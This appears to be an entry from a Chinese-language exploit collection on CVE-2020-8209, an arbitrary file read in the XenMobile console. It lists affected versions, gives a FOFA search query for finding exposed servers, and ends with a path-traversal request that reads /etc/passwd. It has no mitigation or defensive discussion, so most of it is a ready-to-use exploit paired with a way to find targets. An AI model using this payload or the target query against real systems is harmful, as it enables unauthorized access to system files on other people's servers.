(CVE-2020-8209)XenMobile-控制台存在任意文件读取漏洞

0x01 影响版本

  RP2之前的XenMobile服务器10.12
  RP4之前的XenMobile服务器10.11
  RP6之前的XenMobile服务器10.10
  10.9 RP5之前的XenMobile服务器

0x02 fofa语法

  app="XenMobile-控制台"

应用截图

0x03 POC

  /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd